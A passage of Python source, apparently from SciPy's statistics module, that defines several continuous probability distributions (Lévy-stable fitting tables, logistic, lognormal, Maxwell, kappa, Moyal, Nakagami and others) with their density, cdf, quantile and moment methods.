[0, 0.253, 0.518, 0.823, 1.575, 1.000, 1.000],
[0, 0.203, 0.410, 0.632, 1.244, 1.906, 1.000],
[0, 0.165, 0.332, 0.499, 0.943, 1.560, 1.000],
[0, 0.136, 0.271, 0.404, 0.689, 1.230, 2.195],
[0, 0.109, 0.216, 0.323, 0.539, 0.827, 1.917],
[0, 0.096, 0.190, 0.284, 0.472, 0.693, 1.759],
[0, 0.082, 0.163, 0.243, 0.412, 0.601, 1.596],
[0, 0.074, 0.147, 0.220, 0.377, 0.546, 1.482],
[0, 0.064, 0.128, 0.191, 0.330, 0.478, 1.362],
[0, 0.056, 0.112, 0.167, 0.285, 0.428, 1.274]]
# Table V and VII
alpha_range = [2, 1.9, 1.8, 1.7, 1.6, 1.5, 1.4, 1.3, 1.2, 1.1, 1, 0.9, 0.8, 0.7, 0.6, 0.5]
beta_range = [0, 0.25, 0.5, 0.75, 1]
# Table V - nu_c = psi_3(alpha, beta)
nu_c_table = [
[1.908, 1.908, 1.908, 1.908, 1.908],
[1.914, 1.915, 1.916, 1.918, 1.921],
[1.921, 1.922, 1.927, 1.936, 1.947],
[1.927, 1.930, 1.943, 1.961, 1.987],
[1.933, 1.940, 1.962, 1.997, 2.043],
[1.939, 1.952, 1.988, 2.045, 2.116],
[1.946, 1.967, 2.022, 2.106, 2.211],
[1.955, 1.984, 2.067, 2.188, 2.333],
[1.965, 2.007, 2.125, 2.294, 2.491],
[1.980, 2.040, 2.205, 2.435, 2.696],
[2.000, 2.085, 2.311, 2.624, 2.973],
[2.040, 2.149, 2.461, 2.886, 3.356],
[2.098, 2.244, 2.676, 3.265, 3.912],
[2.189, 2.392, 3.004, 3.844, 4.775],
[2.337, 2.634, 3.542, 4.808, 6.247],
[2.588, 3.073, 4.534, 6.636, 9.144]]
# Table VII - nu_zeta = psi_5(alpha, beta)
nu_zeta_table = [
[0, 0.000, 0.000, 0.000, 0.000],
[0, -0.017, -0.032, -0.049, -0.064],
[0, -0.030, -0.061, -0.092, -0.123],
[0, -0.043, -0.088, -0.132, -0.179],
[0, -0.056, -0.111, -0.170, -0.232],
[0, -0.066, -0.134, -0.206, -0.283],
[0, -0.075, -0.154, -0.241, -0.335],
[0, -0.084, -0.173, -0.276, -0.390],
[0, -0.090, -0.192, -0.310, -0.447],
[0, -0.095, -0.208, -0.346, -0.508],
[0, -0.098, -0.223, -0.380, -0.576],
[0, -0.099, -0.237, -0.424, -0.652],
[0, -0.096, -0.250, -0.469, -0.742],
[0, -0.089, -0.262, -0.520, -0.853],
[0, -0.078, -0.272, -0.581, -0.997],
[0, -0.061, -0.279, -0.659, -1.198]]
psi_1 = interpolate.interp2d(nu_beta_range, nu_alpha_range, alpha_table, kind='linear')
psi_2 = interpolate.interp2d(nu_beta_range, nu_alpha_range, beta_table, kind='linear')
psi_2_1 = lambda nu_beta, nu_alpha: psi_2(nu_beta, nu_alpha) if nu_beta > 0 else -psi_2(-nu_beta, nu_alpha)
phi_3 = interpolate.interp2d(beta_range, alpha_range, nu_c_table, kind='linear')
phi_3_1 = lambda beta, alpha: phi_3(beta, alpha) if beta > 0 else phi_3(-beta, alpha)
phi_5 = interpolate.interp2d(beta_range, alpha_range, nu_zeta_table, kind='linear')
phi_5_1 = lambda beta, alpha: phi_5(beta, alpha) if beta > 0 else -phi_5(-beta, alpha)
# quantiles
p05 = np.percentile(data, 5)
p50 = np.percentile(data, 50)
p95 = np.percentile(data, 95)
p25 = np.percentile(data, 25)
p75 = np.percentile(data, 75)
nu_alpha = (p95 - p05)/(p75 - p25)
nu_beta = (p95 + p05 - 2*p50)/(p95 - p05)
if nu_alpha >= 2.439:
alpha = np.clip(psi_1(nu_beta, nu_alpha)[0], np.finfo(float).eps, 2.)
beta = np.clip(psi_2_1(nu_beta, nu_alpha)[0], -1., 1.)
else:
alpha = 2.0
beta = np.sign(nu_beta)
c = (p75 - p25) / phi_3_1(beta, alpha)[0]
zeta = p50 + c*phi_5_1(beta, alpha)[0]
delta = np.clip(zeta-beta*c*np.tan(np.pi*alpha/2.) if alpha == 1. else zeta, np.finfo(float).eps, np.inf)
return (alpha, beta, delta, c)
def _stats(self, alpha, beta):
mu = 0 if alpha > 1 else np.nan
mu2 = 2 if alpha == 2 else np.inf
        g1 = 0. if alpha == 2. else np.nan
        g2 = 0. if alpha == 2. else np.nan
return mu, mu2, g1, g2
levy_stable = levy_stable_gen(name='levy_stable')
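# A minimal usage sketch (commented out so nothing runs at import time;
# assumes SciPy is installed). The pdf tuning knobs documented in the class
# docstring above are plain attributes set on the ``levy_stable`` instance:
#
#     import numpy as np
#     from scipy.stats import levy_stable
#     levy_stable.pdf_default_method = 'zolotarev'     # or 'quadrature', 'best'
#     levy_stable.pdf_fft_min_points_threshold = None  # keep FFT disabled
#     levy_stable.pdf(np.linspace(-3, 3, 7), 1.5, 0.5)  # alpha=1.5, beta=0.5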
class logistic_gen(rv_continuous):
r"""A logistic (or Sech-squared) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `logistic` is:
.. math::
f(x) = \frac{\exp(-x)}
{(1+\exp(-x))^2}
`logistic` is a special case of `genlogistic` with ``c=1``.
%(after_notes)s
%(example)s
"""
def _rvs(self):
return self._random_state.logistic(size=self._size)
def _pdf(self, x):
# logistic.pdf(x) = exp(-x) / (1+exp(-x))**2
return np.exp(self._logpdf(x))
def _logpdf(self, x):
return -x - 2. * sc.log1p(np.exp(-x))
def _cdf(self, x):
return sc.expit(x)
def _ppf(self, q):
return sc.logit(q)
def _sf(self, x):
return sc.expit(-x)
def _isf(self, q):
return -sc.logit(q)
def _stats(self):
return 0, np.pi*np.pi/3.0, 0, 6.0/5.0
def _entropy(self):
# https://en.wikipedia.org/wiki/Logistic_distribution
return 2.0
logistic = logistic_gen(name='logistic')
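# Quick sanity sketch (commented out; assumes SciPy): the cdf/ppf pair above
# is the expit/logit pair from ``scipy.special``, so they invert each other:
#
#     import numpy as np
#     from scipy.stats import logistic
#     q = np.array([0.1, 0.5, 0.9])
#     assert np.allclose(logistic.cdf(logistic.ppf(q)), q)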
class loggamma_gen(rv_continuous):
r"""A log gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `loggamma` is:
.. math::
f(x, c) = \frac{\exp(c x - \exp(x))}
{\Gamma(c)}
for all :math:`x, c > 0`. Here, :math:`\Gamma` is the
gamma function (`scipy.special.gamma`).
`loggamma` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _rvs(self, c):
return np.log(self._random_state.gamma(c, size=self._size))
def _pdf(self, x, c):
# loggamma.pdf(x, c) = exp(c*x-exp(x)) / gamma(c)
return np.exp(c*x-np.exp(x)-sc.gammaln(c))
def _cdf(self, x, c):
return sc.gammainc(c, np.exp(x))
def _ppf(self, q, c):
return np.log(sc.gammaincinv(c, q))
def _stats(self, c):
# See, for example, "A Statistical Study of Log-Gamma Distribution", by
# Ping Shing Chan (thesis, McMaster University, 1993).
mean = sc.digamma(c)
var = sc.polygamma(1, c)
skewness = sc.polygamma(2, c) / np.power(var, 1.5)
excess_kurtosis = sc.polygamma(3, c) / (var*var)
return mean, var, skewness, excess_kurtosis
loggamma = loggamma_gen(name='loggamma')
class loglaplace_gen(rv_continuous):
r"""A log-Laplace continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `loglaplace` is:
.. math::
f(x, c) = \begin{cases}\frac{c}{2} x^{ c-1} &\text{for } 0 < x < 1\\
\frac{c}{2} x^{-c-1} &\text{for } x \ge 1
\end{cases}
for :math:`c > 0`.
`loglaplace` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
References
----------
T.J. Kozubowski and K. Podgorski, "A log-Laplace growth rate model",
The Mathematical Scientist, vol. 28, pp. 49-60, 2003.
%(example)s
"""
def _pdf(self, x, c):
# loglaplace.pdf(x, c) = c / 2 * x**(c-1), for 0 < x < 1
# = c / 2 * x**(-c-1), for x >= 1
cd2 = c/2.0
c = np.where(x < 1, c, -c)
return cd2*x**(c-1)
def _cdf(self, x, c):
return np.where(x < 1, 0.5*x**c, 1-0.5*x**(-c))
def _ppf(self, q, c):
return np.where(q < 0.5, (2.0*q)**(1.0/c), (2*(1.0-q))**(-1.0/c))
def _munp(self, n, c):
return c**2 / (c**2 - n**2)
def _entropy(self, c):
return np.log(2.0/c) + 1.0
loglaplace = loglaplace_gen(a=0.0, name='loglaplace')
def _lognorm_logpdf(x, s):
return _lazywhere(x != 0, (x, s),
lambda x, s: -np.log(x)**2 / (2*s**2) - np.log(s*x*np.sqrt(2*np.pi)),
-np.inf)
class lognorm_gen(rv_continuous):
r"""A lognormal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `lognorm` is:
.. math::
f(x, s) = \frac{1}{s x \sqrt{2\pi}}
\exp\left(-\frac{\log^2(x)}{2s^2}\right)
for :math:`x > 0`, :math:`s > 0`.
`lognorm` takes ``s`` as a shape parameter for :math:`s`.
%(after_notes)s
A common parametrization for a lognormal random variable ``Y`` is in
terms of the mean, ``mu``, and standard deviation, ``sigma``, of the
unique normally distributed random variable ``X`` such that exp(X) = Y.
This parametrization corresponds to setting ``s = sigma`` and ``scale =
exp(mu)``.
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self, s):
return np.exp(s * self._random_state.standard_normal(self._size))
def _pdf(self, x, s):
# lognorm.pdf(x, s) = 1 / (s*x*sqrt(2*pi)) * exp(-1/2*(log(x)/s)**2)
return np.exp(self._logpdf(x, s))
def _logpdf(self, x, s):
return _lognorm_logpdf(x, s)
def _cdf(self, x, s):
return _norm_cdf(np.log(x) / s)
def _logcdf(self, x, s):
return _norm_logcdf(np.log(x) / s)
def _ppf(self, q, s):
return np.exp(s * _norm_ppf(q))
def _sf(self, x, s):
return _norm_sf(np.log(x) / s)
def _logsf(self, x, s):
return _norm_logsf(np.log(x) / s)
def _stats(self, s):
p = np.exp(s*s)
mu = np.sqrt(p)
mu2 = p*(p-1)
g1 = np.sqrt((p-1))*(2+p)
g2 = np.polyval([1, 2, 3, 0, -6.0], p)
return mu, mu2, g1, g2
def _entropy(self, s):
return 0.5 * (1 + np.log(2*np.pi) + 2 * np.log(s))
@extend_notes_in_docstring(rv_continuous, notes="""\
When the location parameter is fixed by using the `floc` argument,
this function uses explicit formulas for the maximum likelihood
estimation of the log-normal shape and scale parameters, so the
`optimizer`, `loc` and `scale` keyword arguments are ignored.\n\n""")
def fit(self, data, *args, **kwds):
floc = kwds.get('floc', None)
if floc is None:
# loc is not fixed. Use the default fit method.
return super(lognorm_gen, self).fit(data, *args, **kwds)
f0 = (kwds.get('f0', None) or kwds.get('fs', None) or
kwds.get('fix_s', None))
fscale = kwds.get('fscale', None)
if len(args) > 1:
raise TypeError("Too many input arguments.")
for name in ['f0', 'fs', 'fix_s', 'floc', 'fscale', 'loc', 'scale',
'optimizer']:
kwds.pop(name, None)
if kwds:
raise TypeError("Unknown arguments: %s." % kwds)
# Special case: loc is fixed. Use the maximum likelihood formulas
# instead of the numerical solver.
if f0 is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
data = np.asarray(data)
floc = float(floc)
if floc != 0:
# Shifting the data by floc. Don't do the subtraction in-place,
# because `data` might be a view of the input array.
data = data - floc
if np.any(data <= 0):
raise FitDataError("lognorm", lower=floc, upper=np.inf)
lndata = np.log(data)
# Three cases to handle:
# * shape and scale both free
# * shape fixed, scale free
# * shape free, scale fixed
if fscale is None:
# scale is free.
scale = np.exp(lndata.mean())
if f0 is None:
# shape is free.
shape = lndata.std()
else:
# shape is fixed.
shape = float(f0)
else:
# scale is fixed, shape is free
scale = float(fscale)
shape = np.sqrt(((lndata - np.log(scale))**2).mean())
return shape, floc, scale
lognorm = lognorm_gen(a=0.0, name='lognorm')
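# Sketch of the explicit-formula path in ``lognorm_gen.fit`` (commented out;
# assumes SciPy): with ``floc=0`` the returned shape and scale are exactly the
# standard deviation and exponentiated mean of ``log(data)``:
#
#     import numpy as np
#     from scipy.stats import lognorm
#     rng = np.random.RandomState(0)
#     data = lognorm.rvs(0.7, scale=2.0, size=10000, random_state=rng)
#     shape, loc, scale = lognorm.fit(data, floc=0)
#     assert np.isclose(shape, np.log(data).std())
#     assert np.isclose(scale, np.exp(np.log(data).mean()))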
class gilbrat_gen(rv_continuous):
r"""A Gilbrat continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gilbrat` is:
.. math::
f(x) = \frac{1}{x \sqrt{2\pi}} \exp(-\frac{1}{2} (\log(x))^2)
`gilbrat` is a special case of `lognorm` with ``s=1``.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self):
return np.exp(self._random_state.standard_normal(self._size))
def _pdf(self, x):
# gilbrat.pdf(x) = 1/(x*sqrt(2*pi)) * exp(-1/2*(log(x))**2)
return np.exp(self._logpdf(x))
def _logpdf(self, x):
return _lognorm_logpdf(x, 1.0)
def _cdf(self, x):
return _norm_cdf(np.log(x))
def _ppf(self, q):
return np.exp(_norm_ppf(q))
def _stats(self):
p = np.e
mu = np.sqrt(p)
mu2 = p * (p - 1)
g1 = np.sqrt((p - 1)) * (2 + p)
g2 = np.polyval([1, 2, 3, 0, -6.0], p)
return mu, mu2, g1, g2
def _entropy(self):
return 0.5 * np.log(2 * np.pi) + 0.5
gilbrat = gilbrat_gen(a=0.0, name='gilbrat')
class maxwell_gen(rv_continuous):
r"""A Maxwell continuous random variable.
%(before_notes)s
Notes
-----
A special case of a `chi` distribution, with ``df=3``, ``loc=0.0``,
and given ``scale = a``, where ``a`` is the parameter used in the
Mathworld description [1]_.
The probability density function for `maxwell` is:
.. math::
f(x) = \sqrt{2/\pi}x^2 \exp(-x^2/2)
for :math:`x >= 0`.
%(after_notes)s
References
----------
.. [1] http://mathworld.wolfram.com/MaxwellDistribution.html
%(example)s
"""
def _rvs(self):
return chi.rvs(3.0, size=self._size, random_state=self._random_state)
def _pdf(self, x):
# maxwell.pdf(x) = sqrt(2/pi)x**2 * exp(-x**2/2)
return np.sqrt(2.0/np.pi)*x*x*np.exp(-x*x/2.0)
def _cdf(self, x):
return sc.gammainc(1.5, x*x/2.0)
def _ppf(self, q):
return np.sqrt(2*sc.gammaincinv(1.5, q))
def _stats(self):
val = 3*np.pi-8
return (2*np.sqrt(2.0/np.pi),
3-8/np.pi,
np.sqrt(2)*(32-10*np.pi)/val**1.5,
(-12*np.pi*np.pi + 160*np.pi - 384) / val**2.0)
def _entropy(self):
return _EULER + 0.5*np.log(2*np.pi)-0.5
maxwell = maxwell_gen(a=0.0, name='maxwell')
class mielke_gen(rv_continuous):
r"""A Mielke Beta-Kappa / Dagum continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `mielke` is:
.. math::
f(x, k, s) = \frac{k x^{k-1}}{(1+x^s)^{1+k/s}}
for :math:`x > 0` and :math:`k, s > 0`. The distribution is sometimes
called Dagum distribution ([2]_). It was already defined in [3]_, called
a Burr Type III distribution (`burr` with parameters ``c=s`` and
``d=k/s``).
`mielke` takes ``k`` and ``s`` as shape parameters.
%(after_notes)s
References
----------
.. [1] Mielke, P.W., 1973 "Another Family of Distributions for Describing
and Analyzing Precipitation Data." J. Appl. Meteor., 12, 275-280
.. [2] Dagum, C., 1977 "A new model for personal income distribution."
Economie Appliquee, 33, 327-367.
.. [3] Burr, I. W. "Cumulative frequency functions", Annals of
Mathematical Statistics, 13(2), pp 215-232 (1942).
%(example)s
"""
def _argcheck(self, k, s):
return (k > 0) & (s > 0)
def _pdf(self, x, k, s):
return k*x**(k-1.0) / (1.0+x**s)**(1.0+k*1.0/s)
def _logpdf(self, x, k, s):
return np.log(k) + np.log(x)*(k-1.0) - np.log1p(x**s)*(1.0+k*1.0/s)
def _cdf(self, x, k, s):
return x**k / (1.0+x**s)**(k*1.0/s)
def _ppf(self, q, k, s):
qsk = pow(q, s*1.0/k)
return pow(qsk/(1.0-qsk), 1.0/s)
def _munp(self, n, k, s):
def nth_moment(n, k, s):
# n-th moment is defined for -k < n < s
return sc.gamma((k+n)/s)*sc.gamma(1-n/s)/sc.gamma(k/s)
return _lazywhere(n < s, (n, k, s), nth_moment, np.inf)
mielke = mielke_gen(a=0.0, name='mielke')
class kappa4_gen(rv_continuous):
r"""Kappa 4 parameter distribution.
%(before_notes)s
Notes
-----
The probability density function for kappa4 is:
.. math::
f(x, h, k) = (1 - k x)^{1/k - 1} (1 - h (1 - k x)^{1/k})^{1/h-1}
if :math:`h` and :math:`k` are not equal to 0.
If :math:`h` or :math:`k` are zero then the pdf can be simplified:
h = 0 and k != 0::
kappa4.pdf(x, h, k) = (1.0 - k*x)**(1.0/k - 1.0)*
exp(-(1.0 - k*x)**(1.0/k))
h != 0 and k = 0::
kappa4.pdf(x, h, k) = exp(-x)*(1.0 - h*exp(-x))**(1.0/h - 1.0)
h = 0 and k = 0::
kappa4.pdf(x, h, k) = exp(-x)*exp(-exp(-x))
kappa4 takes :math:`h` and :math:`k` as shape parameters.
The kappa4 distribution returns other distributions when certain
:math:`h` and :math:`k` values are used.
+------+-------------+----------------+------------------+
| h | k=0.0 | k=1.0 | -inf<=k<=inf |
+======+=============+================+==================+
| -1.0 | Logistic | | Generalized |
| | | | Logistic(1) |
| | | | |
| | logistic(x) | | |
+------+-------------+----------------+------------------+
| 0.0 | Gumbel | Reverse | Generalized |
| | | Exponential(2) | Extreme Value |
| | | | |
| | gumbel_r(x) | | genextreme(x, k) |
+------+-------------+----------------+------------------+
| 1.0 | Exponential | Uniform | Generalized |
| | | | Pareto |
| | | | |
| | expon(x) | uniform(x) | genpareto(x, -k) |
+------+-------------+----------------+------------------+
(1) There are at least five generalized logistic distributions.
Four are described here:
https://en.wikipedia.org/wiki/Generalized_logistic_distribution
The "fifth" one is the one kappa4 should match which currently
isn't implemented in scipy:
https://en.wikipedia.org/wiki/Talk:Generalized_logistic_distribution
https://www.mathwave.com/help/easyfit/html/analyses/distributions/gen_logistic.html
(2) This distribution is currently not in scipy.
References
----------
J.C. Finney, "Optimization of a Skewed Logistic Distribution With Respect
to the Kolmogorov-Smirnov Test", A Dissertation Submitted to the Graduate
Faculty of the Louisiana State University and Agricultural and Mechanical
College, (August, 2004),
https://digitalcommons.lsu.edu/gradschool_dissertations/3672
J.R.M. Hosking, "The four-parameter kappa distribution". IBM J. Res.
    Develop. 38 (3), 251-258 (1994).
B. Kumphon, A. Kaew-Man, P. Seenoi, "A Rainfall Distribution for the Lampao
Site in the Chi River Basin, Thailand", Journal of Water Resource and
Protection, vol. 4, 866-869, (2012).
https://doi.org/10.4236/jwarp.2012.410101
C. Winchester, "On Estimation of the Four-Parameter Kappa Distribution", A
Thesis Submitted to Dalhousie University, Halifax, Nova Scotia, (March
2000).
http://www.nlc-bnc.ca/obj/s4/f2/dsk2/ftp01/MQ57336.pdf
%(after_notes)s
%(example)s
"""
def _argcheck(self, h, k):
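        # h and k may be any real numbers (including zero and negatives);
        # ``h == h`` merely rejects nan values.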
return h == h
def _get_support(self, h, k):
condlist = [np.logical_and(h > 0, k > 0),
np.logical_and(h > 0, k == 0),
np.logical_and(h > 0, k < 0),
np.logical_and(h <= 0, k > 0),
np.logical_and(h <= 0, k == 0),
np.logical_and(h <= 0, k < 0)]
def f0(h, k):
return (1.0 - float_power(h, -k))/k
def f1(h, k):
return np.log(h)
def f3(h, k):
a = np.empty(np.shape(h))
a[:] = -np.inf
return a
def f5(h, k):
return 1.0/k
_a = _lazyselect(condlist,
[f0, f1, f0, f3, f3, f5],
[h, k],
default=np.nan)
def f0(h, k):
return 1.0/k
def f1(h, k):
a = np.empty(np.shape(h))
a[:] = np.inf
return a
_b = _lazyselect(condlist,
[f0, f1, f1, f0, f1, f1],
[h, k],
default=np.nan)
return _a, _b
def _pdf(self, x, h, k):
# kappa4.pdf(x, h, k) = (1.0 - k*x)**(1.0/k - 1.0)*
# (1.0 - h*(1.0 - k*x)**(1.0/k))**(1.0/h-1)
return np.exp(self._logpdf(x, h, k))
def _logpdf(self, x, h, k):
condlist = [np.logical_and(h != 0, k != 0),
np.logical_and(h == 0, k != 0),
np.logical_and(h != 0, k == 0),
np.logical_and(h == 0, k == 0)]
def f0(x, h, k):
'''pdf = (1.0 - k*x)**(1.0/k - 1.0)*(
1.0 - h*(1.0 - k*x)**(1.0/k))**(1.0/h-1.0)
logpdf = ...
'''
return (sc.xlog1py(1.0/k - 1.0, -k*x) +
sc.xlog1py(1.0/h - 1.0, -h*(1.0 - k*x)**(1.0/k)))
def f1(x, h, k):
'''pdf = (1.0 - k*x)**(1.0/k - 1.0)*np.exp(-(
1.0 - k*x)**(1.0/k))
logpdf = ...
'''
return sc.xlog1py(1.0/k - 1.0, -k*x) - (1.0 - k*x)**(1.0/k)
def f2(x, h, k):
'''pdf = np.exp(-x)*(1.0 - h*np.exp(-x))**(1.0/h - 1.0)
logpdf = ...
'''
return -x + sc.xlog1py(1.0/h - 1.0, -h*np.exp(-x))
def f3(x, h, k):
'''pdf = np.exp(-x-np.exp(-x))
logpdf = ...
'''
return -x - np.exp(-x)
return _lazyselect(condlist,
[f0, f1, f2, f3],
[x, h, k],
default=np.nan)
def _cdf(self, x, h, k):
return np.exp(self._logcdf(x, h, k))
def _logcdf(self, x, h, k):
condlist = [np.logical_and(h != 0, k != 0),
np.logical_and(h == 0, k != 0),
np.logical_and(h != 0, k == 0),
np.logical_and(h == 0, k == 0)]
def f0(x, h, k):
'''cdf = (1.0 - h*(1.0 - k*x)**(1.0/k))**(1.0/h)
logcdf = ...
'''
return (1.0/h)*sc.log1p(-h*(1.0 - k*x)**(1.0/k))
def f1(x, h, k):
'''cdf = np.exp(-(1.0 - k*x)**(1.0/k))
logcdf = ...
'''
return -(1.0 - k*x)**(1.0/k)
def f2(x, h, k):
'''cdf = (1.0 - h*np.exp(-x))**(1.0/h)
logcdf = ...
'''
return (1.0/h)*sc.log1p(-h*np.exp(-x))
def f3(x, h, k):
'''cdf = np.exp(-np.exp(-x))
logcdf = ...
'''
return -np.exp(-x)
return _lazyselect(condlist,
[f0, f1, f2, f3],
[x, h, k],
default=np.nan)
def _ppf(self, q, h, k):
condlist = [np.logical_and(h != 0, k != 0),
np.logical_and(h == 0, k != 0),
np.logical_and(h != 0, k == 0),
np.logical_and(h == 0, k == 0)]
def f0(q, h, k):
return 1.0/k*(1.0 - ((1.0 - (q**h))/h)**k)
def f1(q, h, k):
return 1.0/k*(1.0 - (-np.log(q))**k)
def f2(q, h, k):
'''ppf = -np.log((1.0 - (q**h))/h)
'''
return -sc.log1p(-(q**h)) + np.log(h)
def f3(q, h, k):
return -np.log(-np.log(q))
return _lazyselect(condlist,
[f0, f1, f2, f3],
[q, h, k],
default=np.nan)
def _stats(self, h, k):
if h >= 0 and k >= 0:
maxr = 5
elif h < 0 and k >= 0:
maxr = int(-1.0/h*k)
elif k < 0:
maxr = int(-1.0/k)
else:
maxr = 5
outputs = [None if r < maxr else np.nan for r in range(1, 5)]
return outputs[:]
kappa4 = kappa4_gen(name='kappa4')
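# Commented-out sketch of a few rows of the special-case table in the
# docstring above (assumes SciPy): with ``k = 0``, the value of ``h`` selects
# the logistic, Gumbel or exponential distribution:
#
#     import numpy as np
#     from scipy.stats import kappa4, expon, gumbel_r, logistic
#     x = np.linspace(0.1, 3, 5)
#     assert np.allclose(kappa4.pdf(x, -1.0, 0.0), logistic.pdf(x))
#     assert np.allclose(kappa4.pdf(x, 0.0, 0.0), gumbel_r.pdf(x))
#     assert np.allclose(kappa4.pdf(x, 1.0, 0.0), expon.pdf(x))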
class kappa3_gen(rv_continuous):
r"""Kappa 3 parameter distribution.
%(before_notes)s
Notes
-----
The probability density function for `kappa3` is:
.. math::
f(x, a) = a (a + x^a)^{-(a + 1)/a}
for :math:`x > 0` and :math:`a > 0`.
`kappa3` takes ``a`` as a shape parameter for :math:`a`.
References
----------
P.W. Mielke and E.S. Johnson, "Three-Parameter Kappa Distribution Maximum
Likelihood and Likelihood Ratio Tests", Methods in Weather Research,
701-707, (September, 1973),
https://doi.org/10.1175/1520-0493(1973)101<0701:TKDMLE>2.3.CO;2
B. Kumphon, "Maximum Entropy and Maximum Likelihood Estimation for the
Three-Parameter Kappa Distribution", Open Journal of Statistics, vol 2,
415-419 (2012), https://doi.org/10.4236/ojs.2012.24050
%(after_notes)s
%(example)s
"""
def _argcheck(self, a):
return a > 0
def _pdf(self, x, a):
# kappa3.pdf(x, a) = a*(a + x**a)**(-(a + 1)/a), for x > 0
return a*(a + x**a)**(-1.0/a-1)
def _cdf(self, x, a):
return x*(a + x**a)**(-1.0/a)
def _ppf(self, q, a):
return (a/(q**-a - 1.0))**(1.0/a)
def _stats(self, a):
outputs = [None if i < a else np.nan for i in range(1, 5)]
return outputs[:]
kappa3 = kappa3_gen(a=0.0, name='kappa3')
class moyal_gen(rv_continuous):
r"""A Moyal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `moyal` is:
.. math::
f(x) = \exp(-(x + \exp(-x))/2) / \sqrt{2\pi}
for a real number :math:`x`.
%(after_notes)s
This distribution has utility in high-energy physics and radiation
detection. It describes the energy loss of a charged relativistic
particle due to ionization of the medium [1]_. It also provides an
approximation for the Landau distribution. For an in depth description
see [2]_. For additional description, see [3]_.
References
----------
.. [1] J.E. Moyal, "XXX. Theory of ionization fluctuations",
The London, Edinburgh, and Dublin Philosophical Magazine
and Journal of Science, vol 46, 263-280, (1955).
:doi:`10.1080/14786440308521076` (gated)
.. [2] G. Cordeiro et al., "The beta Moyal: a useful skew distribution",
International Journal of Research and Reviews in Applied Sciences,
vol 10, 171-192, (2012).
http://www.arpapress.com/Volumes/Vol10Issue2/IJRRAS_10_2_02.pdf
.. [3] C. Walck, "Handbook on Statistical Distributions for
Experimentalists; International Report SUF-PFY/96-01", Chapter 26,
University of Stockholm: Stockholm, Sweden, (2007).
http://www.stat.rice.edu/~dobelman/textfiles/DistributionsHandbook.pdf
.. versionadded:: 1.1.0
%(example)s
"""
def _rvs(self):
sz, rndm = self._size, self._random_state
u1 = gamma.rvs(a = 0.5, scale = 2, size=sz, random_state=rndm)
return -np.log(u1)
def _pdf(self, x):
return np.exp(-0.5 * (x + np.exp(-x))) / np.sqrt(2*np.pi)
def _cdf(self, x):
return sc.erfc(np.exp(-0.5 * x) / np.sqrt(2))
def _sf(self, x):
return sc.erf(np.exp(-0.5 * x) / np.sqrt(2))
def _ppf(self, x):
return -np.log(2 * sc.erfcinv(x)**2)
def _stats(self):
mu = np.log(2) + np.euler_gamma
mu2 = np.pi**2 / 2
g1 = 28 * np.sqrt(2) * sc.zeta(3) / np.pi**3
g2 = 4.
return mu, mu2, g1, g2
def _munp(self, n):
if n == 1.0:
return np.log(2) + np.euler_gamma
elif n == 2.0:
return np.pi**2 / 2 + (np.log(2) + np.euler_gamma)**2
elif n == 3.0:
tmp1 = 1.5 * np.pi**2 * (np.log(2)+np.euler_gamma)
tmp2 = (np.log(2)+np.euler_gamma)**3
tmp3 = 14 * sc.zeta(3)
return tmp1 + tmp2 + tmp3
elif n == 4.0:
tmp1 = 4 * 14 * sc.zeta(3) * (np.log(2) + np.euler_gamma)
tmp2 = 3 * np.pi**2 * (np.log(2) + np.euler_gamma)**2
tmp3 = (np.log(2) + np.euler_gamma)**4
tmp4 = 7 * np.pi**4 / 4
return tmp1 + tmp2 + tmp3 + tmp4
else:
# return generic for higher moments
# return rv_continuous._mom1_sc(self, n, b)
return self._mom1_sc(n)
moyal = moyal_gen(name="moyal")
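# Commented-out Monte Carlo sketch of the sampling identity used in
# ``moyal_gen._rvs`` (assumes SciPy): gamma(a=0.5, scale=2) is chi-square
# with one degree of freedom, so ``-log(u)`` with ``u ~ chi2(1)`` is Moyal:
#
#     import numpy as np
#     from scipy.stats import moyal, chi2
#     rng = np.random.RandomState(3)
#     samples = -np.log(chi2.rvs(1, size=200000, random_state=rng))
#     assert abs(samples.mean() - moyal.mean()) < 0.02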
class nakagami_gen(rv_continuous):
r"""A Nakagami continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `nakagami` is:
.. math::
f(x, \nu) = \frac{2 \nu^\nu}{\Gamma(\nu)} x^{2\nu-1} \exp(-\nu x^2)
for :math:`x >= 0`, :math:`\nu > 0`.
`nakagami` takes ``nu`` as a shape parameter for :math:`\nu`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, nu):
# nakagami.pdf(x, nu) = 2 * nu**nu / gamma(nu) *
# x**(2*nu-1) * exp(-nu*x**2)
return 2*nu**nu/sc.gamma(nu)*(x**(2*nu-1.0))*np.exp(-nu*x*x)
def _cdf(self, x, nu):
return sc.gammainc(nu, nu*x*x)
def _ppf(self, q, nu):
return np.sqrt(1.0/nu*sc.gammaincinv(nu, q))
def _stats(self, nu):
mu = sc.gamma(nu+0.5)/sc.gamma(nu)/np.sqrt(nu)
mu2 = 1.0-mu*mu
g1 = mu * (1 - 4*nu*mu2) / 2.0 / nu / np.power(mu2, 1.5)
g2 = -6*mu**4*nu + (8*nu-2)*mu**2-2*nu + 1
g2 /= nu*mu2**2.0
return mu, mu2, g1, g2
nakagami = nakagami_gen(a=0.0, name="nakagami")
class ncx2_gen(rv_continuous):
r"""A non-central chi-squared continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `ncx2` is:
.. math::
f(x, k, \lambda) = \frac{1}{2} \exp(-(\lambda+x)/2)
(x/\lambda)^{(k-2)/4} I_{(k-2)/2}(\sqrt{\lambda x})
for :math:`x >= 0` and :math:`k, \lambda > 0`. :math:`k` specifies the
degrees of freedom (denoted ``df`` in the implementation) and
:math:`\lambda` is the non-centrality parameter (denoted ``nc`` in the
implementation). :math:`I_\nu` denotes the modified Bessel function of
first order of degree :math:`\nu` (`scipy.special.iv`).
